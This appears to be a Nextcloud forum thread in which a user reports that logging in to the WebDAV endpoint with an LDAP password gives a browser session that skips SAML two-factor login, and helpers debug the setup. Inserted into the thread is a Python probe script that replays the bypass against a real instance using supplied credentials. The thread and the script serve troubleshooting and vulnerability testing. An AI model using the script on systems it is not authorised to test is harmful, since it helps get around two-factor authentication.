SAML authentication bypass vulnerability

Nextcloud version 25.0.7
Ubuntu 20.04.6
Apache version 2.4.41-4ubuntu3.14
PHP version 7.4

Good day! I am using the LDAP and SAML apps in my Nextcloud instance, and I faced the problem of SAML authentication being bypassed in the browser.

Steps to replicate it:

  1. Open https://<instance_name>/remote.php/dav/files/<user_name>
  2. Enter correct credentials
  3. Delete <user_name> from the URL
  4. Step by step, delete files/, dav/ and remote.php from the URL
  5. Cheers, you are logged in without SAML.

In the case of my IdP, which provides 2FA with SAML auth, such a bypass is a vulnerability.

Does anyone know how it can be fixed without app passwords for DAV clients?

When you enter correct credentials in the browser after opening https://<instance_name>/remote.php/dav/files/, there is a page saying: This is the WebDAV interface. It can only be accessed by WebDAV clients such as the Nextcloud desktop sync client. Perhaps there is a way to turn this message into an error for browsers?

Thank you in advance!
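The steps above can be reproduced over plain HTTP instead of clicking through a browser, which also makes them repeatable after any fix. The following script is an added example, not code from the original post or from Nextcloud: it sends the user's normal (LDAP) password as HTTP Basic auth to /remote.php/dav/files/<user>/, keeps only the cookies that response sets, and then requests the web UI at /index.php/apps/files/ with those cookies and no Authorization header. A 200 there means the DAV login produced a browser session that never went through the IdP; a redirect to the login page is the healthy outcome. The paths, the cookie names and the simulated server are assumptions and constructed test data, not captured from a real instance.

```python
"""Probe: does Basic auth against the WebDAV endpoint yield a web-UI session
that skipped SAML? Added example; the simulated server is constructed data."""
import base64
import sys
import urllib.error
import urllib.request


def basic_auth_header(user, password):
    token = base64.b64encode(f"{user}:{password}".encode("utf-8")).decode("ascii")
    return f"Basic {token}"


def cookie_pairs_from(set_cookie_values):
    """Reduce Set-Cookie headers to the name=value pairs a browser would send back."""
    return [v.split(";", 1)[0].strip() for v in set_cookie_values if "=" in v]


def probe_dav_session(fetch, base_url, user, password):
    """Replay the report's steps.

    fetch(method, url, headers) -> (status, [(header, value), ...]) and must NOT
    follow redirects: a 302 to the login page is the result we want to see.
    Returns a dict; 'bypass' is True when DAV-issued cookies open the web UI.
    """
    base = base_url.rstrip("/")
    status, headers = fetch("GET", f"{base}/remote.php/dav/files/{user}/",
                            {"Authorization": basic_auth_header(user, password)})
    result = {"dav_status": status, "cookies": 0, "ui_status": None, "bypass": False}
    if status in (401, 403):
        result["detail"] = "DAV did not accept the password; nothing to bypass"
        return result
    pairs = cookie_pairs_from([v for k, v in headers if k.lower() == "set-cookie"])
    result["cookies"] = len(pairs)
    if not pairs:
        result["detail"] = "DAV accepted the password but issued no session cookie"
        return result
    # Steps 3-4 of the report: back to the web UI with ONLY those cookies, no Authorization.
    ui_status, ui_headers = fetch("GET", f"{base}/index.php/apps/files/",
                                  {"Cookie": "; ".join(pairs)})
    location = next((v for k, v in ui_headers if k.lower() == "location"), "")
    result["ui_status"] = ui_status
    result["bypass"] = ui_status == 200
    result["detail"] = ("web UI served with DAV-issued cookies: SAML bypassed" if result["bypass"]
                        else f"web UI answered {ui_status} -> {location or '(no Location header)'}")
    return result


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface the 3xx as the response instead of following it


def urllib_fetch(method, url, headers):
    """Real transport for probe_dav_session; assumes the instance is reachable over HTTPS."""
    req = urllib.request.Request(url, headers=headers, method=method)
    try:
        resp = urllib.request.build_opener(_NoRedirect).open(req, timeout=20)
    except urllib.error.HTTPError as err:
        resp = err  # 3xx/4xx/5xx responses still carry the headers we need
    return resp.code, list(resp.headers.items())


def simulated_server(behaviour):
    """Constructed stand-in for an instance (assumed cookie names, not a capture).
    'vulnerable' mirrors the report; 'fixed' makes the web UI insist on the login
    page; 'ldap_filter' is an LDAP login filter that never qualifies, so DAV itself
    rejects the password."""
    good_auth = basic_auth_header("alice", "ldap-password")
    cookies = [("Set-Cookie", "nc_session_id=c0ffee; Path=/; HttpOnly; Secure"),
               ("Set-Cookie", "oc_sessionPassphrase=s3cret; Path=/; HttpOnly; Secure")]

    def fetch(method, url, headers):
        if "/remote.php/dav/files/" in url:
            if behaviour != "ldap_filter" and headers.get("Authorization") == good_auth:
                return 200, cookies
            return 401, [("WWW-Authenticate", 'Basic realm="Nextcloud"')]
        if behaviour == "vulnerable" and "nc_session_id=c0ffee" in headers.get("Cookie", ""):
            return 200, [("Content-Type", "text/html")]
        return 302, [("Location", "/index.php/login")]
    return fetch


if __name__ == "__main__":
    if len(sys.argv) == 4:  # usage: probe.py https://<instance_name> <user_name> <password>
        print(probe_dav_session(urllib_fetch, *sys.argv[1:]))
    else:
        for mode in ("vulnerable", "fixed", "ldap_filter"):
            print(mode, probe_dav_session(simulated_server(mode),
                                          "https://cloud.example", "alice", "ldap-password"))
```

Run it with the instance URL, a user name and that user's LDAP password to probe a real instance; without arguments it exercises the three simulated behaviours. Because the transport never follows redirects, a healthy instance shows up as `ui_status` 302 rather than being silently walked to the IdP.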

Enter correct credentials

Do you mean enter the app password? I believe this is expected as the app password isn’t scoped in any way except for filesystem access. You could always log in via the app password from https://<instance_name>/index.php/login?direct=1

Hey,

thanks for your report! Can you please share your SAML configuration (remove any sensitive information) with us?

Thank you!

Just noticed that all versions you’re using are heavily outdated and not supported anymore. Does the same happen on supported versions?
See Maintenance and Release Schedule · nextcloud/server Wiki · GitHub

Also,

Do those match against e.g. a local user?

This must be a version thing. Just tested in both lab setup and production. I cannot replicate this.

I could, however, bypass SAML when using an app password. Which is expected.


Is that correct? You open https://<instance_name>/remote.php/dav/files/<user_name> and get redirected to SAML authentication?

I cannot log in to WebDAV with a browser. This is expected. I am presented with a credentials pop-up. I enter my creds and am sent to an “internal server error”. Trying to browse to anything (deleting part of the URL), I am redirected to the login page.

You cannot use SAML with WebDAV. It is not supported by the devices using DAV to access filesystems. It only supports username and password.

But I cannot bypass it to gain access to anything.


Sounds great. Do you have the “Enforce two-factor authentication” checkbox enabled?

In addition, I updated my setup to 25.0.13, and I still have the same issue. Could you specify your version?

I meant the normal password. I am trying to avoid using app passwords, although my issue could be worked around by forcing the use of app passwords.

I believe that’s because you are using a user that has their backend set to local. It needs to be a user_saml backend

For example for my user I see:

sudo docker exec -it -u 33 nextcloud_app php occ user:info dugite-code

  - user_id: dugite-code
  - display_name: dugite-code
  - email: dugite-code
  - cloud_id: dugite-code@example.tld
  - enabled: true
  - groups:
    - Nextcloud
    - admin
    - authentik Admins
    - nextcloud_admin
  - quota: none
  - storage:
    - free: 40330010624
    - used: 1120800088
    - total: 41450810712
    - relative: 2.7
    - quota: -3
  - last_seen: 2023-11-22T09:23:51+00:00
  - user_directory: /var/www/html/data/dugite-code
  - backend: user_saml

I don’t believe there is an easy way to change existing users, and it requires modifying the DB. New users created by the SAML plugin will have the user_saml backend automatically.

I use LDAP as the backend, so yes: none of my users have the user_saml backend.

To repeat what was written already 🙂

  • Can you please share your user_saml configuration?
  • Do the credentials match a locally existing user/password?

That’s all I could get with occ config:list user_saml:

  "user_saml": {
    "enabled": "yes",
    "general-require_provisioned_account": "1",
    "general-use_saml_auth_for_desktop": "1",
    "installed_version": "5.2.0",
    "type": "saml",
    "types": "authentication"
  }

Do you need something more specific?

And I don’t store credentials locally

Then the login works through LDAP. Set a login filter that never qualifies.


This will affect the use of desktop DAV clients, won’t it?

What? My suggestion? That should not be the case, provided they authed properly with SAML when setting up the client.

Perhaps?